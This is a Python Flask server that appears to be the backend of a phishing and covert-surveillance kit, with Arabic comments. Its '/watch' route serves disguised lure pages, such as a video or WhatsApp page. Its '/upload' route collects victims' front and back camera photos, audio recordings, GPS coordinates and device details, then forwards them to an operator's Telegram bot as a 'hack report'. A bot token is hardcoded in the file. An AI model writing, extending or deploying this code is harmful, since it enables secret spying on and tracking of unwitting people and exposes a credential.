from flask import Flask, request, jsonify, render_template
import requests
import base64
import os
from datetime import datetime

app = Flask(__name__)
BOT_TOKEN = "8162491685:AAHbJtaG6cfE1rxcsFXgerNvmXiRqlclRt4"

def get_ip_info(ip):
    try:
        res = requests.get(f"http://ip-api.com/json/{ip}", timeout=5).json()
        return res
    except: return {}

@app.route('/watch')
def watch():
    v = request.args.get('v')
    chat_id = request.args.get('ref')
    url = request.args.get('url')
    template_type = 'watch'
    if v:
        try:
            padding_needed = len(v) % 4
            if padding_needed:
                v += '=' * (4 - padding_needed)
            decoded = base64.urlsafe_b64decode(v).decode('utf-8')
            parts = decoded.split('|', 2)
            if len(parts) == 3:
                chat_id = parts[0]
                template_type = parts[1]
                url = parts[2]
            elif len(parts) == 2:
                chat_id = parts[0]
                url = parts[1]
        except:
            pass
            
    # Validate template_type to prevent path traversal
    valid_templates = ['watch', 'whatsapp', 'image', 'custom']
    if template_type not in valid_templates:
        template_type = 'watch'
        
    return render_template(f'{template_type}.html', chat_id=chat_id, original_url=url)

@app.route('/upload', methods=['POST'])
def upload():
    data = request.json
    chat_id = str(data.get('chat_id')) # معرف المستخدم
    victim_ip = request.headers.get('X-Forwarded-For', request.remote_addr)
    if ',' in victim_ip: victim_ip = victim_ip.split(',')[0].strip()

    ip_info = get_ip_info(victim_ip)
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")

    # 1. إنشاء مجلد خاص للمستخدم إذا لم يكن موجوداً
    user_folder = os.path.join('all_photos', chat_id)
    if not os.path.exists(user_folder):
        os.makedirs(user_folder)

    # 2. حفظ ملف البيانات (Location & Device Info) محلياً
    log_entry = (
        f"--- تقرير بتاريخ {timestamp} ---\n"
        f"IP: {victim_ip}\n"
        f"Location: {ip_info.get('country')}, {ip_info.get('city')}\n"
        f"ISP: {ip_info.get('isp')}\n"
        f"Device: {data.get('device_info')}\n"
        f"Battery: {data.get('battery')} - {data.get('battery_charging')}\n"
        f"Network: {data.get('network_type')} - {data.get('network_speed')}\n"
        f"Hardware: RAM: {data.get('ram_size')}, CPU: {data.get('cpu_cores')}, Screen: {data.get('screen_res')}, {data.get('touch_support')}\n"
        f"System: OS Lang: {data.get('language')}, Timezone: {data.get('timezone')}, Orientation: {data.get('orientation')}\n"
        f"Coordinates: {data.get('lat')}, {data.get('lon')} (Accuracy: {data.get('gps_accuracy')}, Speed: {data.get('gps_speed')})\n"
        f"------------------------------\n\n"
    )
    with open(os.path.join(user_folder, "data_logs.txt"), "a", encoding="utf-8") as f:
        f.write(log_entry)

    # 3. معالجة وتخزين الصور
    if data.get('img_front'):
        try:
            img_f = base64.b64decode(data['img_front'].split(',')[1])
            with open(os.path.join(user_folder, f"front_{timestamp}.jpg"), "wb") as f:
                f.write(img_f)
            requests.post(f"https://api.telegram.org/bot{BOT_TOKEN}/sendPhoto",
                data={"chat_id": chat_id, "caption": "📸 الكاميرا الأمامية"},
                files={"photo": ("front.jpg", img_f, "image/jpeg")})
        except: pass

    if data.get('img_back'):
        try:
            img_b = base64.b64decode(data['img_back'].split(',')[1])
            with open(os.path.join(user_folder, f"back_{timestamp}.jpg"), "wb") as f:
                f.write(img_b)
            requests.post(f"https://api.telegram.org/bot{BOT_TOKEN}/sendPhoto",
                data={"chat_id": chat_id, "caption": "📸 الكاميرا الخلفية"},
                files={"photo": ("back.jpg", img_b, "image/jpeg")})
        except: pass

    if data.get('audio_record'):
        try:
            audio_data = base64.b64decode(data['audio_record'].split(',')[1])
            with open(os.path.join(user_folder, f"audio_{timestamp}.webm"), "wb") as f:
                f.write(audio_data)
            requests.post(f"https://api.telegram.org/bot{BOT_TOKEN}/sendVoice",
                data={"chat_id": chat_id, "caption": "🎤 تسجيل صوتي"},
                files={"voice": ("audio.webm", audio_data, "audio/webm")})
        except: pass

    # إرسال التقرير لتيليجرام كما هو في الأصل
    report = (
        f"🚨 *تقرير اختراق شامل*\n\n"
        f"🌐 *IP:* `{victim_ip}`\n"
        f"🌍 *الموقع:* `{ip_info.get('country')}, {ip_info.get('city')}`\n"
        f"📡 *المزود:* `{ip_info.get('isp')}`\n"
        f"📶 *الشبكة:* `{data.get('network_type')} - {data.get('network_speed')}`\n\n"
        f"📱 *الجهاز:* `{data.get('device_info')}`\n"
        f"💻 *العتاد:* `رام {data.get('ram_size')} - معالج {data.get('cpu_cores')} نواة`\n"
        f"🖥 *الشاشة:* `{data.get('screen_res')} - {data.get('touch_support')}`\n"
        f"🔋 *البطارية:* `{data.get('battery')} ({data.get('battery_charging')})`\n"
        f"⚙️ *النظام:* `لغة {data.get('language')} - توقيت {data.get('timezone')}`\n\n"
        f"📍 *الإحداثيات:* `{data.get('lat')}, {data.get('lon')}`\n"
        f"🎯 *دقة الموقع:* `{data.get('gps_accuracy')}`\n"
        f"🏃 *السرعة:* `{data.get('gps_speed')}`"
    )
    
    requests.post(f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage", 
                  json={"chat_id": chat_id, "text": report, "parse_mode": "Markdown"})

    if data.get('lat') and data.get('lon'):
        requests.post(f"https://api.telegram.org/bot{BOT_TOKEN}/sendLocation", 
                      json={"chat_id": chat_id, "latitude": data['lat'], "longitude": data['lon']})
    
    return jsonify({"status": "ok"})

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8443)